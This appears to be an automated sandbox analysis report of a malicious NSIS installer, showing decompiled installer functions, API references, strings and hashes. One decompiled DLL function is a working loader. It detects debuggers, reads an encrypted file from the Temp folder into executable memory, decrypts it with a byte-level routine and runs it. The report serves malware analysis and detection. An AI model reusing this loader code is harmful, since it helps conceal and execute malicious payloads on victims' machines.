									_t55 = E00405877(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E0040521E(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4c8 =  *0x42f4c8 + 1;
										} else {
											E0040521E(0xfffffff1, _t73);
											E00405ED6(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004058BF(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b898 - 0x5c;
					if( *0x42b898 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E0040646B(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405A8F(_t73);
							_t40 = E00405877(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E0040521E(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E0040521E(0xfffffff1, _t73);
							return E00405ED6(_t72, _t73, 0);
						}
						L33:
						 *0x42f4c8 =  *0x42f4c8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                0x004058c9
                0x004058ce
                0x004058d7
                0x004058da
                0x004058e2
                0x004058e5
                0x004058e8
                0x004058f0
                0x004058f2
                0x004058f3
                0x00000000
                0x004058f3
                0x004058fe
                0x00405901
                0x00405901
                0x00405901
                0x00405905
                0x00405918
                0x0040591f
                0x00405924
                0x00405928
                0x00405938
                0x0040592a
                0x00405930
                0x00405930
                0x0040593d
                0x00405940
                0x0040594b
                0x00405951
                0x00405956
                0x00405966
                0x00405968
                0x0040596e
                0x00405971
                0x00405974
                0x00405a2c
                0x00405a2c
                0x00405a30
                0x00405a32
                0x00405a32
                0x00405a32
                0x00405a32
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040597a
                0x0040597a
                0x00405983
                0x00405989
                0x0040598e
                0x00405991
                0x00405993
                0x00405997
                0x00405999
                0x00405999
                0x00405997
                0x0040599c
                0x0040599f
                0x004059b2
                0x004059b4
                0x004059b9
                0x004059c0
                0x004059db
                0x004059e0
                0x004059e2
                0x00405a06
                0x004059e4
                0x004059e4
                0x004059e7
                0x004059fb
                0x004059e9
                0x004059ec
                0x004059f4
                0x004059f4
                0x004059e7
                0x004059c2
                0x004059c8
                0x004059ca
                0x004059d0
                0x004059d0
                0x004059ca
                0x00000000
                0x004059c0
                0x004059a1
                0x004059a4
                0x004059a6
                0x00000000
                0x00000000
                0x004059a8
                0x004059aa
                0x00000000
                0x00000000
                0x004059ac
                0x004059b0
                0x00000000
                0x00000000
                0x00000000
                0x00405a0b
                0x00405a15
                0x00405a1b
                0x00405a1b
                0x00405a26
                0x00000000
                0x00405a26
                0x00405942
                0x00405949
                0x00000000
                0x00000000
                0x00000000
                0x00405907
                0x00405907
                0x00405909
                0x00405a36
                0x00405a38
                0x00405a3b
                0x00405a8c
                0x00405a8c
                0x00405a8c
                0x00405a3d
                0x00405a40
                0x00405a4b
                0x00405a50
                0x00405a52
                0x00000000
                0x00000000
                0x00405a55
                0x00405a61
                0x00405a66
                0x00405a68
                0x00000000
                0x00405a83
                0x00405a6a
                0x00405a6d
                0x00000000
                0x00000000
                0x00405a72
                0x00000000
                0x00405a79
                0x00405a42
                0x00405a42
                0x00000000
                0x00405a42
                0x0040590f
                0x00405912
                0x00000000
                0x00000000
                0x00000000
                0x00405912

                APIs
                • DeleteFileA.KERNELBASE(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                • FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                • FindClose.KERNEL32(00000000), ref: 00405A26
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                • \*.*, xrefs: 0040592A
                • "C:\Users\user\Desktop\bGf2H3tXGg.exe" , xrefs: 004058BF
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                • String ID: "C:\Users\user\Desktop\bGf2H3tXGg.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                • API String ID: 2035342205-3891894385
                • Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                • Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 10001140, Relevance: 13.6, APIs: 9, Instructions: 126filestringCOMMON
                Download Yara Rule
                C-Code - Quality: 79%
                			E10001140() {
				signed int _v5;
				struct _OVERLAPPED* _v12;
				void* _v16;
				long _v20;
				long _v24;
				void* _v28;
				short _v548;
				long _t55;
				void* _t57;
				long _t59;
				void* _t60;
				int _t62;

				_v12 = 0;
				_v24 = 0;
				if(IsDebuggerPresent() != 0) {
					DebugBreak();
				}
				E10001000();
				_t55 = GetTempPathW(0x103,  &_v548);
				if(_t55 != 0) {
					lstrcatW( &_v548, 0x10003000);
					_t57 = CreateFileW( &_v548, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_v16 = _t57;
					if(_v16 != 0xffffffff) {
						_t59 = GetFileSize(_v16, 0);
						_v20 = _t59;
						if(_v20 != 0xffffffff) {
							_t60 = VirtualAlloc(0, _v20, 0x3000, 0x40); // executed
							 *0x1000302c = _t60;
							if( *0x1000302c != 0) {
								_t62 = ReadFile(_v16,  *0x1000302c, _v20,  &_v24, 0); // executed
								if(_t62 != 0) {
									FindCloseChangeNotification(_v16); // executed
									_v12 = 0;
									while(_v12 < _v24) {
										_v5 =  *((intOrPtr*)( *0x1000302c + _v12));
										_v5 = (_v5 & 0x000000ff) - 0x3d;
										_v5 = _v5 & 0x000000ff ^ 0x00000007;
										_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
										_v5 = (_v5 & 0x000000ff) - _v12;
										_v5 =  !(_v5 & 0x000000ff);
										_v5 = (_v5 & 0x000000ff) - _v12;
										_v5 = _v5 & 0x000000ff ^ 0x000000d1;
										_v5 = _v12 + (_v5 & 0x000000ff);
										_v5 = _v5 & 0x000000ff ^ 0x00000093;
										_v5 = (_v5 & 0x000000ff) + 0x44;
										 *((char*)( *0x1000302c + _v12)) = _v5;
										_v12 =  &(_v12->Internal);
									}
									_v28 =  *0x1000302c;
									 *0x100020a4(); // executed
									return _v28();
								}
								return _t62;
							}
							return _t60;
						}
						return _t59;
					}
					return _t57;
				} else {
					return _t55;
				}
			}















                0x10001149
                0x10001150
                0x1000115f
                0x10001161
                0x10001161
                0x10001167
                0x10001178
                0x10001180
                0x10001193
                0x100011b2
                0x100011b8
                0x100011bf
                0x100011cc
                0x100011d2
                0x100011d9
                0x100011ed
                0x100011f3
                0x100011ff
                0x1000121b
                0x10001223
                0x1000122e
                0x10001234
                0x10001246
                0x1000125c
                0x10001266
                0x10001270
                0x10001282
                0x1000128c
                0x10001295
                0x1000129f
                0x100012ab
                0x100012b5
                0x100012c2
                0x100012cc
                0x100012db
                0x10001243
                0x10001243
                0x100012e7
                0x100012ed
                0x00000000
                0x100012f3
                0x00000000
                0x10001223
                0x00000000
                0x100011ff
                0x00000000
                0x100011d9
                0x00000000
                0x00000000
                0x00000000
                0x00000000

                APIs
                • IsDebuggerPresent.KERNEL32 ref: 10001157
                • DebugBreak.KERNEL32 ref: 10001161
                • GetTempPathW.KERNEL32(00000103,?), ref: 10001178
                • lstrcatW.KERNEL32(?,10003000), ref: 10001193
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 100011B2
                • GetFileSize.KERNEL32(000000FF,00000000), ref: 100011CC
                Memory Dump Source
                • Source File: 00000000.00000002.256047878.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                • Associated: 00000000.00000002.256041003.0000000010000000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.256053495.0000000010002000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.256060050.0000000010004000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$BreakCreateDebugDebuggerPathPresentSizeTemplstrcat
                • String ID:
                • API String ID: 3387724011-0
                • Opcode ID: 654d6cc6bda687c2126d4e8120b40575b06e360e86480a58b1eab55cdbf9aa21
                • Instruction ID: 1b8f206140e46b40f8892c82d4497af35837fa909e52085900f9582b4d9b2705
                • Opcode Fuzzy Hash: 654d6cc6bda687c2126d4e8120b40575b06e360e86480a58b1eab55cdbf9aa21
                • Instruction Fuzzy Hash: BD517570D08399EFEB05CBF4C898BEDBFB4EF09381F048199E551A6286C6755749CB21
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040646B, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040646B(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0e0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0e0;
			}




                0x00406476
                0x0040647f
                0x00000000
                0x0040648c
                0x00406482
                0x00000000

                APIs
                • FindFirstFileA.KERNELBASE(7519FA90,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                • FindClose.KERNEL32(00000000), ref: 00406482
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Find$CloseFileFirst
                • String ID:
                • API String ID: 2295610775-0
                • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040390A, Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215stringregistryCOMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E0040390A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f434;
				_t17 = E00406500(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a890;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00405FDE(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a890, 0);
					__eflags =  *0x42a890;
					if(__eflags == 0) {
						E00405FDE(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a890, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					_t67 =  *_t17(); // executed
					E00406055("1033", _t67 & 0x0000ffff);
				}
				E00403BCF(_t71, _t84);
				_t80 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x42f4c0 =  *0x42f43c & 0x00000020;
				 *0x42f4dc = 0x10000;
				if(E00405B7D(_t84, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405B7D(_t92, _t80) == 0) {
						E0040618A(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42ec08 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403BCF(_t71, __eflags);
							__eflags =  *0x42f4e0;
							if( *0x42f4e0 != 0) {
								_t28 = E004052F0(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ebec; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a870, 5);
							_t34 = E00406492("RichEd20");
							__eflags = _t34;
							if(_t34 == 0) {
								E00406492("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42ebc0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42ebc0);
								 *0x42ebe4 = _t81;
								RegisterClassA(0x42ebc0);
							}
							_t36 =  *0x42ec00; // 0x0
							_t39 = DialogBoxParamA( *0x42f420, _t36 + 0x00000069 & 0x0000ffff, 0, E00403CA7, 0);
							E0040385A(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f420;
						 *0x42ebc4 = E00401000;
						 *0x42ebd0 =  *0x42f420;
						 *0x42ebd4 = _t25;
						 *0x42ebe4 = 0x40a1f4;
						if(RegisterClassA(0x42ebc0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a870 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3c0;
					E00405FDE(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f478, 0x42e3c0, 0);
					_t57 =  *0x42e3c0; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3c1;
						 *((char*)(E00405ABA(0x42e3c1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E004060F7(_t80, E00405A8F(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405AD6(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}


























                0x00403910
                0x00403919
                0x00403920
                0x00403922
                0x00403936
                0x00403948
                0x0040394f
                0x00403956
                0x0040395c
                0x00403961
                0x00403967
                0x0040397a
                0x0040397a
                0x00403985
                0x00403924
                0x00403924
                0x0040392f
                0x0040392f
                0x0040398a
                0x00403994
                0x0040399d
                0x004039a2
                0x004039b3
                0x00403a3a
                0x00403a42
                0x00403a4b
                0x00403a4b
                0x00403a61
                0x00403a67
                0x00403a75
                0x00403af6
                0x00403afe
                0x00403b08
                0x00403b0d
                0x00403b13
                0x00403b9d
                0x00403ba2
                0x00403ba4
                0x00403bc0
                0x00000000
                0x00403bc0
                0x00403ba6
                0x00403bac
                0x00403bb4
                0x00403bb4
                0x00000000
                0x00403bac
                0x00403b21
                0x00403b2c
                0x00403b31
                0x00403b33
                0x00403b3a
                0x00403b3a
                0x00403b45
                0x00403b4d
                0x00403b4f
                0x00403b51
                0x00403b5a
                0x00403b5d
                0x00403b63
                0x00403b63
                0x00403b69
                0x00403b82
                0x00403b93
                0x00000000
                0x00403b98
                0x00403b00
                0x00403b02
                0x00000000
                0x00403a77
                0x00403a77
                0x00403a83
                0x00403a8d
                0x00403a93
                0x00403a98
                0x00403aa7
                0x00403bc5
                0x00403bc5
                0x00000000
                0x00403bc5
                0x00403ab6
                0x00403af1
                0x00000000
                0x00403af1
                0x004039b9
                0x004039b9
                0x004039bc
                0x004039be
                0x00000000
                0x00000000
                0x004039c8
                0x004039d8
                0x004039dd
                0x004039e4
                0x00000000
                0x00000000
                0x004039e8
                0x004039ea
                0x004039f7
                0x004039f7
                0x004039ff
                0x00403a05
                0x00403a2d
                0x00403a35
                0x00000000
                0x00403a17
                0x00403a18
                0x00403a21
                0x00403a27
                0x00403a28
                0x00000000
                0x00403a28
                0x00403a23
                0x00403a25
                0x00000000
                0x00000000
                0x00000000
                0x00403a25
                0x00403a05

                APIs
                  • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                  • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                • GetUserDefaultUILanguage.KERNELBASE(00000002,7519FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,00000000), ref: 00403924
                  • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,7519FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,00000000), ref: 00403985
                • lstrlenA.KERNEL32(Cgrlcpdlsle,?,?,?,Cgrlcpdlsle,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,7519FA90), ref: 004039FA
                • lstrcmpiA.KERNEL32(?,.exe,Cgrlcpdlsle,?,?,?,Cgrlcpdlsle,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
                • GetFileAttributesA.KERNEL32(Cgrlcpdlsle), ref: 00403A18
                • LoadImageA.USER32 ref: 00403A61
                • RegisterClassA.USER32 ref: 00403A9E
                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                • CreateWindowExA.USER32 ref: 00403AEB
                • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                • GetClassInfoA.USER32 ref: 00403B4D
                • GetClassInfoA.USER32 ref: 00403B5A
                • RegisterClassA.USER32 ref: 00403B63
                • DialogBoxParamA.USER32 ref: 00403B82
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                • String ID: "C:\Users\user\Desktop\bGf2H3tXGg.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Cgrlcpdlsle$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                • API String ID: 606308-3966943423
                • Opcode ID: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
                • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                • Opcode Fuzzy Hash: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
                • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402EA1, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 78%
                			E00402EA1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				intOrPtr* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\alfons\\Desktop\\bGf2H3tXGg.exe";
				 *0x42f430 = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\bGf2H3tXGg.exe", 0x400);
				_t89 = E00405C90(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\alfons\\Desktop";
				E004060F7("C:\\Users\\alfons\\Desktop", _t91);
				E004060F7(0x437000, E00405AD6(_t92));
				_t50 = GetFileSize(_t89, 0);
				 *0x42944c = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E3D(1);
					if( *0x42f438 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t94 = GlobalAlloc(0x40, _v24);
						E00403300( *0x42f438 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004030D8(); // executed
						if(_t57 == _v24) {
							 *0x42f434 = _t94;
							 *0x42f43c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42f440 =  *0x42f440 + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405C4B(0x42f460, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E00403300( *0x41d440);
					if(E004032EA( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42f438) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E004032EA(0x415440, _t90) == 0) {
							E00402E3D(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42f438 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402E3D(0);
							}
							goto L20;
						}
						E00405C4B( &_v44, 0x415440, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x41d440; // 0x63200
							 *0x42f4e0 =  *0x42f4e0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x42f438 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t24 = _t80 - 4; // 0x40a194
								_t93 = _t24;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x42944c) {
							_v12 = E004065B7(_v12, 0x415440, _t90);
						}
						 *0x41d440 =  *0x41d440 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 != 0);
					_t82 = 0;
					goto L24;
				}
			}




























                0x00402ea9
                0x00402eac
                0x00402eaf
                0x00402eb2
                0x00402eb8
                0x00402ec9
                0x00402ece
                0x00402ee1
                0x00402ee6
                0x00402ee9
                0x00402eef
                0x00000000
                0x00402ef1
                0x00402efc
                0x00402f02
                0x00402f13
                0x00402f1a
                0x00402f22
                0x00402f27
                0x00402f29
                0x00403014
                0x00403016
                0x00403022
                0x00000000
                0x00000000
                0x00403027
                0x0040304b
                0x00403056
                0x00403061
                0x00403066
                0x00403069
                0x0040306a
                0x0040306b
                0x0040306d
                0x00403075
                0x0040308c
                0x00403094
                0x00403099
                0x0040309b
                0x0040309b
                0x004030a3
                0x004030a3
                0x004030a6
                0x004030a7
                0x004030a7
                0x004030aa
                0x004030ac
                0x004030ac
                0x004030b6
                0x004030bc
                0x004030ca
                0x00000000
                0x004030cf
                0x00000000
                0x00403075
                0x0040302f
                0x00403041
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00402f2f
                0x00402f34
                0x00402f39
                0x00402f3d
                0x00402f44
                0x00402f4b
                0x00402f4d
                0x00402f4d
                0x00402f58
                0x00403080
                0x00403077
                0x00000000
                0x00403077
                0x00402f65
                0x00402fe5
                0x00402fe9
                0x00402fee
                0x00000000
                0x00402fe5
                0x00402f6e
                0x00402f73
                0x00402f7b
                0x00402fa1
                0x00402fa7
                0x00402fb0
                0x00402fb6
                0x00402fbb
                0x00402fc1
                0x00000000
                0x00000000
                0x00402fcb
                0x00402fd3
                0x00402fd6
                0x00402fd6
                0x00402fdb
                0x00402fdd
                0x00402fdd
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00402fcb
                0x00402fef
                0x00402ff5
                0x00403001
                0x00403001
                0x00403004
                0x0040300a
                0x0040300a
                0x00403012
                0x00000000
                0x00403012

                APIs
                • GetTickCount.KERNEL32 ref: 00402EB2
                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\bGf2H3tXGg.exe,00000400), ref: 00402ECE
                  • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\bGf2H3tXGg.exe,80000000,00000003), ref: 00405C94
